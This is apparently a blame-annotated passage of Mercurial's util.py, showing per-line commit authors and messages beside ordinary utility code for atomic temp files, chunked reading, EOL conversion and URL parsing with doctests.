util: add utility function to skip avoiding file stat ambiguity if EPERM...
r30319
FUJIWARA Katsunori
util: add __ne__ to filestat class for consistency...
r29298 def __ne__(self, other):
return not self == other
Benoit Boissinot
use new style classes
r8778 class atomictempfile(object):
Mads Kiilerich
fix trivial spelling errors
r17424 '''writable file object that atomically updates a file
Alexis S. L. Carvalho
turn util.opener into a class
r4827
Greg Ward
atomictempfile: rewrite docstring to clarify rename() vs. close().
r14008 All writes will go to a temporary copy of the original file. Call
Greg Ward
atomictempfile: make close() consistent with other file-like objects....
r15057 close() when you are done writing, and atomictempfile will rename
the temporary copy to the original name, making the changes
visible. If the object is destroyed without being closed, all your
writes are discarded.
FUJIWARA Katsunori
doc: describe detail about checkambig optional argument...
r29367
checkambig argument of constructor is used with filestat, and is
useful only if target file is guarded by any lock (e.g. repo.lock
or repo.wlock).
Greg Ward
atomictempfile: rewrite docstring to clarify rename() vs. close().
r14008 '''
FUJIWARA Katsunori
util: make atomictempfile avoid ambiguity of file stat if needed...
r29201 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
Greg Ward
atomictempfile: avoid infinite recursion in __del__()....
r14007 self.__name = name # permanent name
self._tempname = mktempcopy(name, emptyok=('w' in mode),
Boris Feld
update: fix edge-case with update.atomic-file and read-only files...
r41325 createmode=createmode,
enforcewritable=('w' in mode))
Greg Ward
atomictempfile: avoid infinite recursion in __del__()....
r14007 self._fp = posixfile(self._tempname, mode)
FUJIWARA Katsunori
util: make atomictempfile avoid ambiguity of file stat if needed...
r29201 self._checkambig = checkambig
Bryan O'Sullivan
atomictempfile: delegate to posixfile instead of inheriting from it
r8327
Greg Ward
atomictempfile: avoid infinite recursion in __del__()....
r14007 # delegated methods
Martijn Pieters
atomictempfile: add read to the supported file operations
r29393 self.read = self._fp.read
Greg Ward
atomictempfile: avoid infinite recursion in __del__()....
r14007 self.write = self._fp.write
Bryan O'Sullivan
util: delegate seek and tell methods of atomictempfile
r17237 self.seek = self._fp.seek
self.tell = self._fp.tell
Greg Ward
atomictempfile: avoid infinite recursion in __del__()....
r14007 self.fileno = self._fp.fileno
Alexis S. L. Carvalho
turn util.opener into a class
r4827
Greg Ward
atomictempfile: make close() consistent with other file-like objects....
r15057 def close(self):
Benoit Boissinot
atomictempfile: fix exception in __del__ if mktempcopy fails (self._fp is None)...
r8785 if not self._fp.closed:
Bryan O'Sullivan
atomictempfile: delegate to posixfile instead of inheriting from it
r8327 self._fp.close()
FUJIWARA Katsunori
util: make atomictempfile avoid ambiguity of file stat if needed...
r29201 filename = localpath(self.__name)
Siddharth Agarwal
filestat: move __init__ to frompath constructor...
r32772 oldstat = self._checkambig and filestat.frompath(filename)
FUJIWARA Katsunori
util: make atomictempfile avoid ambiguity of file stat if needed...
r29201 if oldstat and oldstat.stat:
rename(self._tempname, filename)
Siddharth Agarwal
filestat: move __init__ to frompath constructor...
r32772 newstat = filestat.frompath(filename)
FUJIWARA Katsunori
util: make atomictempfile avoid ambiguity of file stat if needed...
r29201 if newstat.isambig(oldstat):
# stat of changed file is ambiguous to original one
Augie Fackler
cleanup: use stat_result[stat.ST_MTIME] instead of stat_result.st_mtime...
r36799 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
FUJIWARA Katsunori
util: make atomictempfile avoid ambiguity of file stat if needed...
r29201 os.utime(filename, (advanced, advanced))
else:
rename(self._tempname, filename)
Alexis S. L. Carvalho
turn util.opener into a class
r4827
Greg Ward
atomictempfile: make close() consistent with other file-like objects....
r15057 def discard(self):
Benoit Boissinot
atomictempfile: fix exception in __del__ if mktempcopy fails (self._fp is None)...
r8785 if not self._fp.closed:
Alexis S. L. Carvalho
turn util.opener into a class
r4827 try:
Greg Ward
atomictempfile: avoid infinite recursion in __del__()....
r14007 os.unlink(self._tempname)
except OSError:
pass
Bryan O'Sullivan
atomictempfile: delegate to posixfile instead of inheriting from it
r8327 self._fp.close()
Alexis S. L. Carvalho
turn util.opener into a class
r4827
Dan Villiom Podlaski Christiansen
util: make atomicfiles closable
r13098 def __del__(self):
Augie Fackler
util: use safehasattr or getattr instead of hasattr
r14968 if safehasattr(self, '_fp'): # constructor actually did something
Greg Ward
atomictempfile: make close() consistent with other file-like objects....
r15057 self.discard()
Dan Villiom Podlaski Christiansen
util: make atomicfiles closable
r13098
Martijn Pieters
atomictempfile: add context manager support...
r29394 def __enter__(self):
return self
def __exit__(self, exctype, excvalue, traceback):
if exctype is not None:
self.discard()
else:
self.close()
Kyle Lippincott
unlinkpath: make empty directory removal optional (issue5901) (issue5826)...
r38512 def unlinkpath(f, ignoremissing=False, rmdir=True):
Ryan McElroy
util: unify unlinkpath...
r31539 """unlink and remove the directory if it is empty"""
Ryan McElroy
util: use tryunlink in unlinkpath...
r31541 if ignoremissing:
tryunlink(f)
else:
Ryan McElroy
util: unify unlinkpath...
r31539 unlink(f)
Kyle Lippincott
unlinkpath: make empty directory removal optional (issue5901) (issue5826)...
r38512 if rmdir:
# try removing directories that might now be empty
try:
removedirs(os.path.dirname(f))
except OSError:
pass
Ryan McElroy
util: unify unlinkpath...
r31539
Ryan McElroy
util: add tryunlink function...
r31540 def tryunlink(f):
"""Attempt to remove a file, ignoring ENOENT errors."""
try:
unlink(f)
except OSError as e:
if e.errno != errno.ENOENT:
raise
Angel Ezquerra
util: add notindexed optional parameter to makedirs function
r18938 def makedirs(name, mode=None, notindexed=False):
Adam Simpkins
util: fix race in makedirs()...
r29017 """recursive directory creation with parent mode inheritance
Newly created directories are marked as "not to be indexed by
the content indexing service", if ``notindexed`` is specified
for "write" mode access.
"""
Alexis S. L. Carvalho
Make files in .hg inherit the permissions from .hg/store
r6062 try:
Angel Ezquerra
util: add notindexed optional parameter to makedirs function
r18938 makedir(name, notindexed)
Gregory Szorc
global: mass rewrite to use modern exception syntax...
r25660 except OSError as err:
Alexis S. L. Carvalho
Make files in .hg inherit the permissions from .hg/store
r6062 if err.errno == errno.EEXIST:
return
Adrian Buehlmann
util: postpone and reorder parent calculation in makedirs
r15058 if err.errno != errno.ENOENT or not name:
raise
parent = os.path.dirname(os.path.abspath(name))
if parent == name:
Alexis S. L. Carvalho
Make files in .hg inherit the permissions from .hg/store
r6062 raise
Angel Ezquerra
util: add notindexed optional parameter to makedirs function
r18938 makedirs(parent, mode, notindexed)
Adam Simpkins
util: fix race in makedirs()...
r29017 try:
makedir(name, notindexed)
except OSError as err:
# Catch EEXIST to handle races
if err.errno == errno.EEXIST:
return
raise
Bryan O'Sullivan
util: make ensuredirs safer against races
r18678 if mode is not None:
os.chmod(name, mode)
Bryan O'Sullivan
scmutil: create directories in a race-safe way during update...
r18668
Dan Villiom Podlaski Christiansen
util: add readfile() & writefile() helper functions...
r14099 def readfile(path):
Bryan O'Sullivan
util: simplify file I/O functions using context managers
r27778 with open(path, 'rb') as fp:
Matt Mackall
util: really drop size from readfile
r14100 return fp.read()
Dan Villiom Podlaski Christiansen
util: add readfile() & writefile() helper functions...
r14099
Dan Villiom Podlaski Christiansen
util & scmutil: adapt read/write helpers as request by mpm
r14167 def writefile(path, text):
Bryan O'Sullivan
util: simplify file I/O functions using context managers
r27778 with open(path, 'wb') as fp:
Dan Villiom Podlaski Christiansen
util & scmutil: adapt read/write helpers as request by mpm
r14167 fp.write(text)
def appendfile(path, text):
Bryan O'Sullivan
util: simplify file I/O functions using context managers
r27778 with open(path, 'ab') as fp:
Dan Villiom Podlaski Christiansen
util: add readfile() & writefile() helper functions...
r14099 fp.write(text)
Eric Hopper
Created a class in util called chunkbuffer that buffers reads from an...
r1199 class chunkbuffer(object):
"""Allow arbitrary sized chunks of data to be efficiently read from an
iterator over chunks of arbitrary size."""
Bryan O'Sullivan
Minor cleanups.
r1200
Matt Mackall
chunkbuffer: removed unused method and arg
r5446 def __init__(self, in_iter):
Martin von Zweigbergk
util: remove doc of long gone 'targetsize' argument...
r32123 """in_iter is the iterator that's iterating over the input chunks."""
Benoit Boissinot
chunkbuffer: split big strings directly in chunkbuffer
r11670 def splitbig(chunks):
for chunk in chunks:
if len(chunk) > 2**20:
pos = 0
while pos < len(chunk):
end = pos + 2 ** 18
yield chunk[pos:end]
pos = end
else:
yield chunk
self.iter = splitbig(in_iter)
Martin von Zweigbergk
util: drop alias for collections.deque...
r25113 self._queue = collections.deque()
Gregory Szorc
util.chunkbuffer: avoid extra mutations when reading partial chunks...
r26480 self._chunkoffset = 0
Bryan O'Sullivan
Minor cleanups.
r1200
Pierre-Yves David
util: support None size in chunkbuffer.read()...
r21018 def read(self, l=None):
Bryan O'Sullivan
Minor cleanups.
r1200 """Read L bytes of data from the iterator of chunks of data.
Pierre-Yves David
util: support None size in chunkbuffer.read()...
r21018 Returns less than L bytes if the iterator runs dry.
Mads Kiilerich
spelling: fixes from proofreading of spell checker issues
r23139 If size parameter is omitted, read everything"""
Gregory Szorc
util.chunkbuffer: special case reading everything...
r26478 if l is None:
return ''.join(self.iter)
Matt Mackall
chunkbuffer: use += rather than cStringIO to reduce memory footprint...
r11758 left = l
Matt Mackall
util: make chunkbuffer non-quadratic on Windows...
r17962 buf = []
Bryan O'Sullivan
util: simplify queue management in chunkbuffer...
r16873 queue = self._queue
Gregory Szorc
util.chunkbuffer: special case reading everything...
r26478 while left > 0:
Matt Mackall
chunkbuffer: use += rather than cStringIO to reduce memory footprint...
r11758 # refill the queue
if not queue:
target = 2**18
for chunk in self.iter:
queue.append(chunk)
target -= len(chunk)
if target <= 0:
break
if not queue:
Eric Hopper
Created a class in util called chunkbuffer that buffers reads from an...
r1199 break
Matt Mackall
chunkbuffer: use += rather than cStringIO to reduce memory footprint...
r11758
Gregory Szorc
util.chunkbuffer: avoid extra mutations when reading partial chunks...
r26480 # The easy way to do this would be to queue.popleft(), modify the
# chunk (if necessary), then queue.appendleft(). However, for cases
# where we read partial chunk content, this incurs 2 dequeue
# mutations and creates a new str for the remaining chunk in the
# queue. Our code below avoids this overhead.
Gregory Szorc
util.chunkbuffer: refactor chunk handling logic...
r26479 chunk = queue[0]
chunkl = len(chunk)
Gregory Szorc
util.chunkbuffer: avoid extra mutations when reading partial chunks...
r26480 offset = self._chunkoffset
Gregory Szorc
util.chunkbuffer: refactor chunk handling logic...
r26479
# Use full chunk.
Gregory Szorc
util.chunkbuffer: avoid extra mutations when reading partial chunks...
r26480 if offset == 0 and left >= chunkl:
Gregory Szorc
util.chunkbuffer: refactor chunk handling logic...
r26479 left -= chunkl
queue.popleft()
buf.append(chunk)
Gregory Szorc
util.chunkbuffer: avoid extra mutations when reading partial chunks...
r26480 # self._chunkoffset remains at 0.
continue
chunkremaining = chunkl - offset
# Use all of unconsumed part of chunk.
if left >= chunkremaining:
left -= chunkremaining
queue.popleft()
# offset == 0 is enabled by block above, so this won't merely
# copy via ``chunk[0:]``.
buf.append(chunk[offset:])
self._chunkoffset = 0
Gregory Szorc
util.chunkbuffer: refactor chunk handling logic...
r26479 # Partial chunk needed.
else:
Gregory Szorc
util.chunkbuffer: avoid extra mutations when reading partial chunks...
r26480 buf.append(chunk[offset:offset + left])
self._chunkoffset += left
left -= chunkremaining
Matt Mackall
chunkbuffer: use += rather than cStringIO to reduce memory footprint...
r11758
Matt Mackall
util: make chunkbuffer non-quadratic on Windows...
r17962 return ''.join(buf)
Matt Mackall
chunkbuffer: use += rather than cStringIO to reduce memory footprint...
r11758
Mads Kiilerich
util: increase filechunkiter size to 128k...
r30181 def filechunkiter(f, size=131072, limit=None):
Vadim Gelfer
util: add limit to amount filechunkiter will read
r2462 """Create a generator that produces the data in the file size
Mads Kiilerich
util: increase filechunkiter size to 128k...
r30181 (default 131072) bytes at a time, up to optional limit (default is
Vadim Gelfer
util: add limit to amount filechunkiter will read
r2462 to read all data). Chunks may be less than size bytes if the
chunk is the last chunk in the file, or the file is a socket or
some other type of file that sometimes reads less data than is
requested."""
assert size >= 0
assert limit is None or limit >= 0
while True:
Matt Mackall
many, many trivial check-code fixups
r10282 if limit is None:
nbytes = size
else:
nbytes = min(limit, size)
Vadim Gelfer
util: add limit to amount filechunkiter will read
r2462 s = nbytes and f.read(nbytes)
Matt Mackall
many, many trivial check-code fixups
r10282 if not s:
break
if limit:
limit -= len(s)
Eric Hopper
Created a class in util called chunkbuffer that buffers reads from an...
r1199 yield s
Bryan O'Sullivan
Fix up representation of dates in hgweb....
r1320
Gregory Szorc
util: add a file object proxy that can read at most N bytes...
r36382 class cappedreader(object):
"""A file object proxy that allows reading up to N bytes.
Given a source file object, instances of this type allow reading up to
N bytes from that source file object. Attempts to read past the allowed
limit are treated as EOF.
It is assumed that I/O is not performed on the original file object
in addition to I/O that is performed by this instance. If there is,
state tracking will get out of sync and unexpected results will ensue.
"""
def __init__(self, fh, limit):
"""Allow reading up to <limit> bytes from <fh>."""
self._fh = fh
self._left = limit
def read(self, n=-1):
if not self._left:
return b''
if n < 0:
n = self._left
data = self._fh.read(min(n, self._left))
self._left -= len(data)
assert self._left >= 0
return data
Gregory Szorc
wireproto: implement basic frame reading and processing...
r37070 def readinto(self, b):
res = self.read(len(b))
if res is None:
return None
b[0:len(res)] = res
return len(res)
Bryan O'Sullivan
util: generalize bytecount to unitcountfn...
r18735 def unitcountfn(*unittable):
'''return a function that renders a readable count of some quantity'''
def go(count):
for multiplier, divisor, format in unittable:
Gábor Stefanik
util: fix human-readable printing of negative byte counts...
r31946 if abs(count) >= divisor * multiplier:
Bryan O'Sullivan
util: generalize bytecount to unitcountfn...
r18735 return format % (count / float(divisor))
return unittable[-1][2] % count
return go
Denis Laxalde
revset: factor out linerange processing into a utility function...
r31662 def processlinerange(fromline, toline):
"""Check that linerange <fromline>:<toline> makes sense and return a
0-based range.
>>> processlinerange(10, 20)
(9, 20)
>>> processlinerange(2, 1)
Traceback (most recent call last):
...
ParseError: line range must be positive
>>> processlinerange(0, 5)
Traceback (most recent call last):
...
ParseError: fromline must be strictly positive
"""
if toline - fromline < 0:
raise error.ParseError(_("line range must be positive"))
if fromline < 1:
raise error.ParseError(_("fromline must be strictly positive"))
return fromline - 1, toline
Bryan O'Sullivan
util: generalize bytecount to unitcountfn...
r18735 bytecount = unitcountfn(
Matt Mackall
util: create bytecount array just once...
r16397 (100, 1 << 30, _('%.0f GB')),
(10, 1 << 30, _('%.1f GB')),
(1, 1 << 30, _('%.2f GB')),
(100, 1 << 20, _('%.0f MB')),
(10, 1 << 20, _('%.1f MB')),
(1, 1 << 20, _('%.2f MB')),
(100, 1 << 10, _('%.0f KB')),
(10, 1 << 10, _('%.1f KB')),
(1, 1 << 10, _('%.2f KB')),
(1, 1, _('%.0f bytes')),
)
Yuya Nishihara
py3: wrap file object to write patch in native eol preserving byte-ness
r36855 class transformingwriter(object):
"""Writable file wrapper to transform data by function"""
def __init__(self, fp, encode):
self._fp = fp
self._encode = encode
def close(self):
self._fp.close()
def flush(self):
self._fp.flush()
def write(self, data):
return self._fp.write(self._encode(data))
Yuya Nishihara
util: extract pure tolf/tocrlf() functions from eol extension...
r31776 # Matches a single EOL which can either be a CRLF where repeated CR
# are removed or a LF. We do not care about old Macintosh files, so a
# stray CR is an error.
_eolre = remod.compile(br'\r*\n')
def tolf(s):
return _eolre.sub('\n', s)
def tocrlf(s):
return _eolre.sub('\r\n', s)
Yuya Nishihara
py3: wrap file object to write patch in native eol preserving byte-ness
r36855 def _crlfwriter(fp):
return transformingwriter(fp, tocrlf)
Yuya Nishihara
util: add helper to convert between LF and native EOL...
r31777 if pycompat.oslinesep == '\r\n':
tonativeeol = tocrlf
fromnativeeol = tolf
Yuya Nishihara
py3: wrap file object to write patch in native eol preserving byte-ness
r36855 nativeeolwriter = _crlfwriter
Yuya Nishihara
util: add helper to convert between LF and native EOL...
r31777 else:
tonativeeol = pycompat.identity
fromnativeeol = pycompat.identity
Yuya Nishihara
py3: wrap file object to write patch in native eol preserving byte-ness
r36855 nativeeolwriter = pycompat.identity
Yuya Nishihara
util: add helper to convert between LF and native EOL...
r31777
Jun Wu
util: improve iterfile so it chooses code path wisely...
r30418 if (pyplatform.python_implementation() == 'CPython' and
sys.version_info < (3, 0)):
# There is an issue in CPython that some IO methods do not handle EINTR
# correctly. The following table shows what CPython version (and functions)
# are affected (buggy: has the EINTR bug, okay: otherwise):
#
# | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
# --------------------------------------------------
# fp.__iter__ | buggy | buggy | okay
# fp.read* | buggy | okay [1] | okay
#
# [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
#
# Here we workaround the EINTR issue for fileobj.__iter__. Other methods
# like "read*" are ignored for now, as Python < 2.7.4 is a minority.
#
# Although we can workaround the EINTR issue for fp.__iter__, it is slower:
# "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
# CPython 2, because CPython 2 maintains an internal readahead buffer for
# fp.__iter__ but not other fp.read* methods.
#
# On modern systems like Linux, the "read" syscall cannot be interrupted
# when reading "fast" files like on-disk files. So the EINTR issue only
# affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
# files approximately as "fast" files and use the fast (unsafe) code path,
# to minimize the performance impact.
if sys.version_info >= (2, 7, 4):
# fp.readline deals with EINTR correctly, use it as a workaround.
def _safeiterfile(fp):
return iter(fp.readline, '')
else:
# fp.read* are broken too, manually deal with EINTR in a stupid way.
# note: this may block longer than necessary because of bufsize.
def _safeiterfile(fp, bufsize=4096):
fd = fp.fileno()
line = ''
while True:
try:
buf = os.read(fd, bufsize)
except OSError as ex:
# os.read only raises EINTR before any data is read
if ex.errno == errno.EINTR:
continue
else:
raise
line += buf
if '\n' in buf:
splitted = line.splitlines(True)
line = ''
for l in splitted:
if l[-1] == '\n':
yield l
else:
line = l
if not buf:
break
if line:
yield line
def iterfile(fp):
fastpath = True
if type(fp) is file:
fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
if fastpath:
return fp
else:
return _safeiterfile(fp)
else:
# PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
def iterfile(fp):
return fp
Jun Wu
util: add iterfile to workaround a fileobj.__iter__ issue with EINTR...
r30395
Alexander Solovyov <piranha at piranha.org.ua>
templater: ability to display diffstat for log-like commands
r7879 def iterlines(iterator):
for chunk in iterator:
for line in chunk.splitlines():
yield line
Alexander Solovyov
make path expanding more consistent...
r9610
def expandpath(path):
return os.path.expanduser(os.path.expandvars(path))
Patrick Mezard
Find right hg command for detached process...
r10239
Roman Sokolov
dispatch: support for $ escaping in shell-alias definition...
r13392 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
Steve Losh
util: add an interpolate() function to for replacing multiple values...
r11988 """Return the result of interpolating items in the mapping into string s.
prefix is a single character string, or a two character string with
a backslash as the first character if the prefix needs to be escaped in
a regular expression.
fn is an optional function that will be applied to the replacement text
just before replacement.
Roman Sokolov
dispatch: support for $ escaping in shell-alias definition...
r13392
escape_prefix is an optional flag that allows using doubled prefix for
its escaping.
Steve Losh
util: add an interpolate() function to for replacing multiple values...
r11988 """
fn = fn or (lambda s: s)
Roman Sokolov
dispatch: support for $ escaping in shell-alias definition...
r13392 patterns = '|'.join(mapping.keys())
if escape_prefix:
patterns += '|' + prefix
if len(prefix) > 1:
prefix_char = prefix[1:]
else:
prefix_char = prefix
mapping[prefix_char] = prefix_char
Pulkit Goyal
py3: add b'' to regular expressions which are raw strings...
r35145 r = remod.compile(br'%s(%s)' % (prefix, patterns))
Steve Losh
util: add an interpolate() function to for replacing multiple values...
r11988 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
Brodie Rao
mail/hgweb: support service names for ports (issue2350)...
r12076 def getport(port):
"""Return the port for a given network service.
If port is an integer, it's returned as is. If it's a string, it's
looked up using socket.getservbyname(). If there's no matching
Pierre-Yves David
error: get Abort from 'error' instead of 'util'...
r26587 service, error.Abort is raised.
Brodie Rao
mail/hgweb: support service names for ports (issue2350)...
r12076 """
try:
return int(port)
except ValueError:
pass
try:
Gregory Szorc
py3: pass system string to socket.getservbyname...
r36055 return socket.getservbyname(pycompat.sysstr(port))
Brodie Rao
mail/hgweb: support service names for ports (issue2350)...
r12076 except socket.error:
Yuya Nishihara
util: use error.Abort instead of local alias
r37114 raise error.Abort(_("no port number associated with service '%s'")
% port)
Augie Fackler
parsebool: create new function and use it for config parsing
r12087
Brodie Rao
url: move URL parsing functions into util to improve startup time...
r14076 class url(object):
Mads Kiilerich
tests: use raw string for url tests of '\' handling
r14146 r"""Reliable URL parser.
Brodie Rao
url: move URL parsing functions into util to improve startup time...
r14076
This parses URLs and provides attributes for the following
components:
<scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
Missing components are set to None. The only exception is
fragment, which is set to '' if present but empty.
If parsefragment is False, fragment is included in query. If
parsequery is False, query is included in path. If both are
False, both fragment and query are included in path.
See http://www.ietf.org/rfc/rfc2396.txt for more information.
Note that for backward compatibility reasons, bundle URLs do not
take host names. That means 'bundle://../' has a path of '../'.
Examples:
Yuya Nishihara
doctest: bulk-replace string literals with b'' for Python 3...
r34133 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
Brodie Rao
url: move URL parsing functions into util to improve startup time...
r14076 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
Yuya Nishihara
doctest: bulk-replace string literals with b'' for Python 3...
r34133 >>> url(b'ssh://[::1]:2200//home/joe/repo')
Brodie Rao
url: move URL parsing functions into util to improve startup time...
r14076 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
Yuya Nishihara
doctest: bulk-replace string literals with b'' for Python 3...
r34133 >>> url(b'file:///home/joe/repo')
Brodie Rao
url: move URL parsing functions into util to improve startup time...
r14076 <url scheme: 'file', path: '/home/joe/repo'>
Yuya Nishihara
doctest: bulk-replace string literals with b'' for Python 3...
r34133 >>> url(b'file:///c:/temp/foo/')
Matt Mackall
url: handle urls of the form file:///c:/foo/bar/ correctly
r14915 <url scheme: 'file', path: 'c:/temp/foo/'>
Yuya Nishihara
doctest: bulk-replace string literals with b'' for Python 3...
r34133 >>> url(b'bundle:foo')
Brodie Rao
url: move URL parsing functions into util to improve startup time...
r14076 <url scheme: 'bundle', path: 'foo'>
Yuya Nishihara
doctest: bulk-replace string literals with b'' for Python 3...
r34133 >>> url(b'bundle://../foo')
Brodie Rao
url: move URL parsing functions into util to improve startup time...
r14076 <url scheme: 'bundle', path: '../foo'>
Yuya Nishihara
doctest: bulk-replace string literals with b'' for Python 3...
r34133 >>> url(br'c:\foo\bar')
Mads Kiilerich
tests: use raw string for url tests of '\' handling
r14146 <url path: 'c:\\foo\\bar'>
Yuya Nishihara
doctest: bulk-replace string literals with b'' for Python 3...
r34133 >>> url(br'\\blah\blah\blah')
Matt Mackall
url: catch UNC paths as yet another Windows special case (issue2808)
r14699 <url path: '\\\\blah\\blah\\blah'>
Yuya Nishihara
doctest: bulk-replace string literals with b'' for Python 3...
r34133 >>> url(br'\\blah\blah\blah#baz')
Matt Mackall
url: parse fragments first (issue2997)
r15074 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
Yuya Nishihara
doctest: bulk-replace string literals with b'' for Python 3...
r34133 >>> url(br'file:///C:\users\me')
Simon Heimberg
util: url keeps backslash in paths...
r20106 <url scheme: 'file', path: 'C:\\users\\me'>
Brodie Rao
url: move URL parsing functions into util to improve startup time...
r14076
Authentication credentials:
Yuya Nishihara
doctest: bulk-replace string literals with b'' for Python 3...
r34133 >>> url(b'ssh://joe:xyz@x/repo')
Brodie Rao
url: move URL parsing functions into util to improve startup time...
r14076 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
Yuya Nishihara
doctest: bulk-replace string literals with b'' for Python 3...
r34133 >>> url(b'ssh://joe@x/repo')
Brodie Rao
url: move URL parsing functions into util to improve startup time...
r14076 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
Query strings and fragments:
Yuya Nishihara
doctest: bulk-replace string literals with b'' for Python 3...
r34133 >>> url(b'http://host/a?b#c')
Brodie Rao
url: move URL parsing functions into util to improve startup time...
r14076 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
Yuya Nishihara
doctest: bulk-replace string literals with b'' for Python 3...
r34133 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
Brodie Rao
url: move URL parsing functions into util to improve startup time...
r14076 <url scheme: 'http', host: 'host', path: 'a?b#c'>
Yuya Nishihara
url: fix crash by empty path with #fragments...
r30036
Empty path:
Yuya Nishihara
doctest: bulk-replace string literals with b'' for Python 3...
r34133 >>> url(b'')
Yuya Nishihara
url: fix crash by empty path with #fragments...
r30036 <url path: ''>
Yuya Nishihara
doctest: bulk-replace string literals with b'' for Python 3...
r34133 >>> url(b'#a')
Yuya Nishihara
url: fix crash by empty path with #fragments...
r30036 <url path: '', fragment: 'a'>
Yuya Nishihara
doctest: bulk-replace string literals with b'' for Python 3...
r34133 >>> url(b'http://host/')
Yuya Nishihara
url: fix crash by empty path with #fragments...
r30036 <url scheme: 'http', host: 'host', path: ''>
Yuya Nishihara
doctest: bulk-replace string literals with b'' for Python 3...
r34133 >>> url(b'http://host/#a')
Yuya Nishihara
url: fix crash by empty path with #fragments...
r30036 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
Only scheme:
Yuya Nishihara
doctest: bulk-replace string literals with b'' for Python 3...
r34133 >>> url(b'http:')
Yuya Nishihara
url: fix crash by empty path with #fragments...
r30036 <url scheme: 'http'>
Brodie Rao
url: move URL parsing functions into util to improve startup time...
r14076 """
_safechars = "!~*'()+"
Simon Heimberg
util: url keeps backslash in paths...
r20106 _safepchars = "/!~*'()+:\\"
Augie Fackler
util: use '\\' rather than using r'\'...
r30329 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
Brodie Rao
url: move URL parsing functions into util to improve startup time...
r14076
def __init__(self, path, parsequery=True, parsefragment=True):
# We slowly chomp away at path until we have only the path left
self.scheme = self.user = self.passwd = self.host = None
self.port = self.path = self.query = self.fragment = None
self._localpath = True
self._hostport = ''
self._origpath = path
Matt Mackall
url: parse fragments first (issue2997)
r15074 if parsefragment and '#' in path:
path, self.fragment = path.split('#', 1)
Matt Mackall
url: catch UNC paths as yet another Windows special case (issue2808)
r14699 # special case for Windows drive letters and UNC paths
Augie Fackler
util: use '\\' rather than using r'\'...
r30329 if hasdriveletter(path) or path.startswith('\\\\'):
Brodie Rao
url: move URL parsing functions into util to improve startup time...
r14076 self.path = path
return
# For compatibility reasons, we can't handle bundle paths as
# normal URLS
if path.startswith('bundle:'):
self.scheme = 'bundle'
path = path[7:]
if path.startswith('//'):
path = path[2:]
self.path = path
return
if self._matchscheme(path):
parts = path.split(':', 1)
if parts[0]:
self.scheme, path = parts
self._localpath = False
if not path:
path = None
if self._localpath:
self.path = ''
return
else:
if self._localpath:
self.path = path
return
if parsequery and '?' in path:
path, self.query = path.split('?', 1)
if not path:
path = None
if not self.query:
self.query = None
# // is required to specify a host/authority
if path and path.startswith('//'):
parts = path[2:].split('/', 1)
if len(parts) > 1:
self.host, path = parts
else:
self.host = parts[0]
path = None
if not self.host:
self.host = None
Mads Kiilerich
url: really handle urls of the form file:///c:/foo/bar/ correctly...
r15018 # path of file:///d is /d
# path of file:///d:/ is d:/, not /d:/
Matt Mackall
url: handle urls of the form file:///c:/foo/bar/ correctly
r14915 if path and not hasdriveletter(path):
Brodie Rao
url: move URL parsing functions into util to improve startup time...
r14076 path = '/' + path
if self.host and '@' in self.host:
self.user, self.host = self.host.rsplit('@', 1)
if ':' in self.user:
self.user, self.passwd = self.user.split(':', 1)
if not self.host:
self.host = None
# Don't split on colons in IPv6 addresses without ports
if (self.host and ':' in self.host and
not (self.host.startswith('[') and self.host.endswith(']'))):
self._hostport = self.host
self.host, self.port = self.host.rsplit(':', 1)
if not self.host:
self.host = None
if (self.host and self.scheme == 'file' and
self.host not in ('localhost', '127.0.0.1', '[::1]')):
Yuya Nishihara
util: use error.Abort instead of local alias
r37114 raise error.Abort(_('file:// URLs can only refer to localhost'))
Brodie Rao
url: move URL parsing functions into util to improve startup time...
r14076
self.path = path
Benoit Boissinot
url: store and assume the query part of an url is in escaped form (issue2921)
r14988 # leave the query string escaped
Brodie Rao
url: move URL parsing functions into util to improve startup time...
r14076 for a in ('user', 'passwd', 'host', 'port',
Benoit Boissinot
url: store and assume the query part of an url is in escaped form (issue2921)
r14988 'path', 'fragment'):
Brodie Rao
url: move URL parsing functions into util to improve startup time...
r14076 v = getattr(self, a)
if v is not None:
Gregory Szorc
util: use urlreq.unquote...
r31567 setattr(self, a, urlreq.unquote(v))
Brodie Rao
url: move URL parsing functions into util to improve startup time...
r14076
Yuya Nishihara
py3: fix repr(util.url) to return system string...
r34074 @encoding.strmethod
Brodie Rao
url: move URL parsing functions into util to improve startup time...
r14076 def __repr__(self):
attrs = []
for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
'query', 'fragment'):
v = getattr(self, a)
if v is not None:
Augie Fackler
util: make util.url __repr__ consistent on Python 2 and 3...
r37890 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
Brodie Rao
url: move URL parsing functions into util to improve startup time...
r14076 return '<url %s>' % ', '.join(attrs)
Yuya Nishihara
py3: add utility to forward __str__() to __bytes__()...
r33022 def __bytes__(self):
Mads Kiilerich
test: test that backslash is preserved by the url class
r14147 r"""Join the URL's components back into a URL string.
Brodie Rao
url: move URL parsing functions into util to improve startup time...
r14076
Examples:
Yuya Nishihara
doctest: replace str() with bytes()
r34136 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
Mads Kiilerich
util: don't encode ':' in url paths...
r15452 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
Yuya Nishihara
doctest: replace str() with bytes()
